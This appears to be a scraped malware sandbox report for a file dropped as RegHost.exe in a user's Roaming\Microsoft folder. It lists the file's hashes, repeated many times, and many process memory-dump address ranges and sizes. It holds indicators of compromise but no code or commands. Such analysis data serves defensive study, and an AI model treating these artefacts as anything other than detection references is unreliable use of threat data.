535a9e5a816025c2c296976561827b7c2da468bf32d168a248e1a3152cd1e65b0b07680198faa4bf1e51de6b816fc2807d37fce5526afd603ca1cd3e653ca62f

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe
MD5
a3578b5feeea4db90bcb5315f769e84d

SHA1
436a4a014f91c138ed9019c58c5c98ada78a7f4f

SHA256
b741574c43d9af88a6b410ae8d8bd175fbbb12f55b189e05be36ff923844d75b

SHA512
535a9e5a816025c2c296976561827b7c2da468bf32d168a248e1a3152cd1e65b0b07680198faa4bf1e51de6b816fc2807d37fce5526afd603ca1cd3e653ca62f

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe
MD5
a3578b5feeea4db90bcb5315f769e84d

SHA1
436a4a014f91c138ed9019c58c5c98ada78a7f4f

SHA256
b741574c43d9af88a6b410ae8d8bd175fbbb12f55b189e05be36ff923844d75b

SHA512
535a9e5a816025c2c296976561827b7c2da468bf32d168a248e1a3152cd1e65b0b07680198faa4bf1e51de6b816fc2807d37fce5526afd603ca1cd3e653ca62f

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe
MD5
a3578b5feeea4db90bcb5315f769e84d

SHA1
436a4a014f91c138ed9019c58c5c98ada78a7f4f

SHA256
b741574c43d9af88a6b410ae8d8bd175fbbb12f55b189e05be36ff923844d75b

SHA512
535a9e5a816025c2c296976561827b7c2da468bf32d168a248e1a3152cd1e65b0b07680198faa4bf1e51de6b816fc2807d37fce5526afd603ca1cd3e653ca62f

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe
MD5
a3578b5feeea4db90bcb5315f769e84d

SHA1
436a4a014f91c138ed9019c58c5c98ada78a7f4f

SHA256
b741574c43d9af88a6b410ae8d8bd175fbbb12f55b189e05be36ff923844d75b

SHA512
535a9e5a816025c2c296976561827b7c2da468bf32d168a248e1a3152cd1e65b0b07680198faa4bf1e51de6b816fc2807d37fce5526afd603ca1cd3e653ca62f

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe
MD5
a3578b5feeea4db90bcb5315f769e84d

SHA1
436a4a014f91c138ed9019c58c5c98ada78a7f4f

SHA256
b741574c43d9af88a6b410ae8d8bd175fbbb12f55b189e05be36ff923844d75b

SHA512
535a9e5a816025c2c296976561827b7c2da468bf32d168a248e1a3152cd1e65b0b07680198faa4bf1e51de6b816fc2807d37fce5526afd603ca1cd3e653ca62f

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe
MD5
a3578b5feeea4db90bcb5315f769e84d

SHA1
436a4a014f91c138ed9019c58c5c98ada78a7f4f

SHA256
b741574c43d9af88a6b410ae8d8bd175fbbb12f55b189e05be36ff923844d75b

SHA512
535a9e5a816025c2c296976561827b7c2da468bf32d168a248e1a3152cd1e65b0b07680198faa4bf1e51de6b816fc2807d37fce5526afd603ca1cd3e653ca62f

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe
MD5
a3578b5feeea4db90bcb5315f769e84d

SHA1
436a4a014f91c138ed9019c58c5c98ada78a7f4f

SHA256
b741574c43d9af88a6b410ae8d8bd175fbbb12f55b189e05be36ff923844d75b

SHA512
535a9e5a816025c2c296976561827b7c2da468bf32d168a248e1a3152cd1e65b0b07680198faa4bf1e51de6b816fc2807d37fce5526afd603ca1cd3e653ca62f

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe
MD5
a3578b5feeea4db90bcb5315f769e84d

SHA1
436a4a014f91c138ed9019c58c5c98ada78a7f4f

SHA256
b741574c43d9af88a6b410ae8d8bd175fbbb12f55b189e05be36ff923844d75b

SHA512
535a9e5a816025c2c296976561827b7c2da468bf32d168a248e1a3152cd1e65b0b07680198faa4bf1e51de6b816fc2807d37fce5526afd603ca1cd3e653ca62f

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe
MD5
a3578b5feeea4db90bcb5315f769e84d

SHA1
436a4a014f91c138ed9019c58c5c98ada78a7f4f

SHA256
b741574c43d9af88a6b410ae8d8bd175fbbb12f55b189e05be36ff923844d75b

SHA512
535a9e5a816025c2c296976561827b7c2da468bf32d168a248e1a3152cd1e65b0b07680198faa4bf1e51de6b816fc2807d37fce5526afd603ca1cd3e653ca62f

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe
MD5
a3578b5feeea4db90bcb5315f769e84d

SHA1
436a4a014f91c138ed9019c58c5c98ada78a7f4f

SHA256
b741574c43d9af88a6b410ae8d8bd175fbbb12f55b189e05be36ff923844d75b

SHA512
535a9e5a816025c2c296976561827b7c2da468bf32d168a248e1a3152cd1e65b0b07680198faa4bf1e51de6b816fc2807d37fce5526afd603ca1cd3e653ca62f

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe
MD5
a3578b5feeea4db90bcb5315f769e84d

SHA1
436a4a014f91c138ed9019c58c5c98ada78a7f4f

SHA256
b741574c43d9af88a6b410ae8d8bd175fbbb12f55b189e05be36ff923844d75b

SHA512
535a9e5a816025c2c296976561827b7c2da468bf32d168a248e1a3152cd1e65b0b07680198faa4bf1e51de6b816fc2807d37fce5526afd603ca1cd3e653ca62f

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe
MD5
a3578b5feeea4db90bcb5315f769e84d

SHA1
436a4a014f91c138ed9019c58c5c98ada78a7f4f

SHA256
b741574c43d9af88a6b410ae8d8bd175fbbb12f55b189e05be36ff923844d75b

SHA512
535a9e5a816025c2c296976561827b7c2da468bf32d168a248e1a3152cd1e65b0b07680198faa4bf1e51de6b816fc2807d37fce5526afd603ca1cd3e653ca62f

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe
MD5
a3578b5feeea4db90bcb5315f769e84d

SHA1
436a4a014f91c138ed9019c58c5c98ada78a7f4f

SHA256
b741574c43d9af88a6b410ae8d8bd175fbbb12f55b189e05be36ff923844d75b

SHA512
535a9e5a816025c2c296976561827b7c2da468bf32d168a248e1a3152cd1e65b0b07680198faa4bf1e51de6b816fc2807d37fce5526afd603ca1cd3e653ca62f

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe
MD5
a3578b5feeea4db90bcb5315f769e84d

SHA1
436a4a014f91c138ed9019c58c5c98ada78a7f4f

SHA256
b741574c43d9af88a6b410ae8d8bd175fbbb12f55b189e05be36ff923844d75b

SHA512
535a9e5a816025c2c296976561827b7c2da468bf32d168a248e1a3152cd1e65b0b07680198faa4bf1e51de6b816fc2807d37fce5526afd603ca1cd3e653ca62f

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe
MD5
a3578b5feeea4db90bcb5315f769e84d

SHA1
436a4a014f91c138ed9019c58c5c98ada78a7f4f

SHA256
b741574c43d9af88a6b410ae8d8bd175fbbb12f55b189e05be36ff923844d75b

SHA512
535a9e5a816025c2c296976561827b7c2da468bf32d168a248e1a3152cd1e65b0b07680198faa4bf1e51de6b816fc2807d37fce5526afd603ca1cd3e653ca62f

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe
MD5
4d5606c1ae3b3ebe19a59dd1c7036171

SHA1
afc48e7ddd32232bb41d9714b0a33467444819b5

SHA256
2afb301cc037c7e193c783024106acfd7a010697c087cd881cd0cb52d9d59a38

SHA512
7ded563a3407bbc01a03ba1ff493c88c4c8100a94022eb9f6076204150a74d83db381c34b3d945f6cc2337088a5168675a5e03bc2a70d21637e29679a8e5bba5

Download Submit
memory/224-217-0x0000000140000000-0x000000014002A000-memory.dmp

Filesize
168KB

Download
memory/528-201-0x0000000140000000-0x000000014002A000-memory.dmp

Filesize
168KB

Download
memory/544-168-0x0000000140000000-0x0000000140815000-memory.dmp

Filesize
8.1MB

Download
memory/868-216-0x0000000140000000-0x0000000140815000-memory.dmp

Filesize
8.1MB

Download
memory/1232-169-0x0000000140000000-0x000000014002A000-memory.dmp

Filesize
168KB

Download
memory/1292-157-0x00007FF649D70000-0x00007FF64A96D000-memory.dmp

Filesize
12.0MB

Download
memory/1292-156-0x00007FF649D70000-0x00007FF64A96D000-memory.dmp

Filesize
12.0MB

Download
memory/1292-155-0x00007FF649D70000-0x00007FF64A96D000-memory.dmp

Filesize
12.0MB

Download
memory/1308-185-0x0000000140000000-0x000000014002A000-memory.dmp

Filesize
168KB

Download
memory/1324-177-0x0000000140000000-0x000000014002A000-memory.dmp

Filesize
168KB

Download
memory/1332-233-0x0000000140000000-0x000000014002A000-memory.dmp

Filesize
168KB

Download
memory/1412-249-0x0000000140000000-0x0000000140815000-memory.dmp

Filesize
8.1MB

Download
memory/1468-184-0x0000000140000000-0x0000000140815000-memory.dmp

Filesize
8.1MB

Download
memory/1540-205-0x00007FF649D70000-0x00007FF64A96D000-memory.dmp

Filesize
12.0MB

Download
memory/1540-203-0x00007FF649D70000-0x00007FF64A96D000-memory.dmp

Filesize
12.0MB

Download
memory/1540-204-0x00007FF649D70000-0x00007FF64A96D000-memory.dmp

Filesize
12.0MB

Download
memory/1588-209-0x0000000140000000-0x000000014002A000-memory.dmp

Filesize
168KB

Download
memory/1588-265-0x0000000140000000-0x000000014002A000-memory.dmp

Filesize
168KB

Download
memory/1600-240-0x0000000140000000-0x0000000140815000-memory.dmp

Filesize
8.1MB

Download
memory/1680-219-0x00007FF649D70000-0x00007FF64A96D000-memory.dmp

Filesize
12.0MB

Download
memory/1680-220-0x00007FF649D70000-0x00007FF64A96D000-memory.dmp

Filesize
12.0MB

Download
memory/1680-221-0x00007FF649D70000-0x00007FF64A96D000-memory.dmp

Filesize
12.0MB

Download
memory/1772-189-0x00007FF649D70000-0x00007FF64A96D000-memory.dmp

Filesize
12.0MB

Download
memory/1772-187-0x00007FF649D70000-0x00007FF64A96D000-memory.dmp

Filesize
12.0MB

Download
memory/1772-188-0x00007FF649D70000-0x00007FF64A96D000-memory.dmp

Filesize
12.0MB

Download
memory/1888-232-0x0000000140000000-0x0000000140815000-memory.dmp

Filesize
8.1MB

Download
memory/2160-192-0x0000000140000000-0x0000000140815000-memory.dmp

Filesize
8.1MB

Download
memory/2224-145-0x0000000140000000-0x000000014002A000-memory.dmp

Filesize
168KB

Download
memory/2260-153-0x0000000140000000-0x0000000140815000-memory.dmp

Filesize
8.1MB

Download
memory/2288-257-0x0000000140000000-0x000000014002A000-memory.dmp

Filesize
168KB

Download
memory/2464-224-0x0000000140000000-0x0000000140815000-memory.dmp

Filesize
8.1MB

Download
memory/2548-152-0x0000000140000000-0x000000014002A000-memory.dmp

Filesize
168KB

Download
memory/2580-144-0x0000000140000000-0x0000000140815000-memory.dmp

Filesize
8.1MB

Download
memory/2700-241-0x0000000140000000-0x000000014002A000-memory.dmp

Filesize
168KB

Download
memory/2804-176-0x0000000140000000-0x0000000140815000-memory.dmp

Filesize
8.1MB

Download
memory/2940-200-0x0000000140000000-0x0000000140815000-memory.dmp

Filesize
8.1MB

Download
memory/3028-208-0x0000000140000000-0x0000000140815000-memory.dmp

Filesize
8.1MB

Download
memory/3036-134-0x0000000140000000-0x000000014002A000-memory.dmp

Filesize
168KB

Download
memory/3036-136-0x0000000140000000-0x000000014002A000-memory.dmp

Filesize
168KB

Download
memory/3048-193-0x0000000140000000-0x000000014002A000-memory.dmp

Filesize
168KB

Download
memory/3140-264-0x0000000140000000-0x0000000140815000-memory.dmp

Filesize
8.1MB

Download
memory/3152-164-0x00007FF649D70000-0x00007FF64A96D000-memory.dmp

Filesize
12.0MB

Download
memory/3152-163-0x00007FF649D70000-0x00007FF64A96D000-memory.dmp

Filesize
12.0MB

Download
memory/3152-165-0x00007FF649D70000-0x00007FF64A96D000-memory.dmp

Filesize
12.0MB

Download
memory/3180-248-0x0000000140000000-0x000000014002A000-memory.dmp

Filesize
168KB

Download
memory/3396-161-0x0000000140000000-0x000000014002A000-memory.dmp

Filesize
168KB

Download
memory/3428-133-0x0000000140000000-0x0000000140815000-memory.dmp

Filesize
8.1MB

Download
memory/3428-135-0x0000000140000000-0x0000000140815000-memory.dmp

Filesize
8.1MB

Download
memory/3456-256-0x0000000140000000-0x0000000140815000-memory.dmp

Filesize
8.1MB

Download
memory/3492-212-0x00007FF649D70000-0x00007FF64A96D000-memory.dmp

Filesize
12.0MB

Download
memory/3492-213-0x00007FF649D70000-0x00007FF64A96D000-memory.dmp

Filesize
12.0MB

Download
memory/3492-211-0x00007FF649D70000-0x00007FF64A96D000-memory.dmp

Filesize
12.0MB

Download
memory/3500-228-0x00007FF649D70000-0x00007FF64A96D000-memory.dmp

Filesize
12.0MB

Download
memory/3500-229-0x00007FF649D70000-0x00007FF64A96D000-memory.dmp

Filesize
12.0MB

Download
memory/3500-227-0x00007FF649D70000-0x00007FF64A96D000-memory.dmp

Filesize
12.0MB

Download
memory/3576-173-0x00007FF649D70000-0x00007FF64A96D000-memory.dmp

Filesize
12.0MB

Download
memory/3576-172-0x00007FF649D70000-0x00007FF64A96D000-memory.dmp

Filesize
12.0MB

Download
memory/3576-171-0x00007FF649D70000-0x00007FF64A96D000-memory.dmp

Filesize
12.0MB

Download
memory/3608-139-0x00007FF649D70000-0x00007FF64A96D000-memory.dmp

Filesize
12.0MB

Download
memory/3608-141-0x00007FF649D70000-0x00007FF64A96D000-memory.dmp

Filesize
12.0MB

Download
memory/3608-140-0x00007FF649D70000-0x00007FF64A96D000-memory.dmp

Filesize
12.0MB

Download
memory/3632-197-0x00007FF649D70000-0x00007FF64A96D000-memory.dmp

Filesize
12.0MB

Download
memory/3632-196-0x00007FF649D70000-0x00007FF64A96D000-memory.dmp

Filesize
12.0MB

Download
memory/3632-195-0x00007FF649D70000-0x00007FF64A96D000-memory.dmp

Filesize
12.0MB

Download
memory/3776-181-0x00007FF649D70000-0x00007FF64A96D000-memory.dmp

Filesize
12.0MB

Download
memory/3776-179-0x00007FF649D70000-0x00007FF64A96D000-memory.dmp

Filesize
12.0MB

Download
memory/3776-180-0x00007FF649D70000-0x00007FF64A96D000-memory.dmp

Filesize
12.0MB

Download
memory/3916-160-0x0000000140000000-0x0000000140815000-memory.dmp

Filesize
8.1MB

Download
memory/3972-148-0x00007FF649D70000-0x00007FF64A96D000-memory.dmp

Filesize
12.0MB

Download
memory/3972-147-0x00007FF649D70000-0x00007FF64A96D000-memory.dmp

Filesize
12.0MB

Download
memory/3972-149-0x00007FF649D70000-0x00007FF64A96D000-memory.dmp

Filesize
12.0MB

Download
memory/3992-225-0x0000000140000000-0x000000014002A000-memory.dmp

Filesize
168KB

Download
memory/4052-130-0x00007FF73FC10000-0x00007FF74080D000-memory.dmp

Filesize
12.0MB

Download
memory/4052-132-0x00007FF73FC10000-0x00007FF74080D000-memory.dmp

Filesize
12.0MB

Download
memory/4052-131-0x00007FF73FC10000-0x00007FF74080D000-memory.dmp

Filesize
12.0MB

Download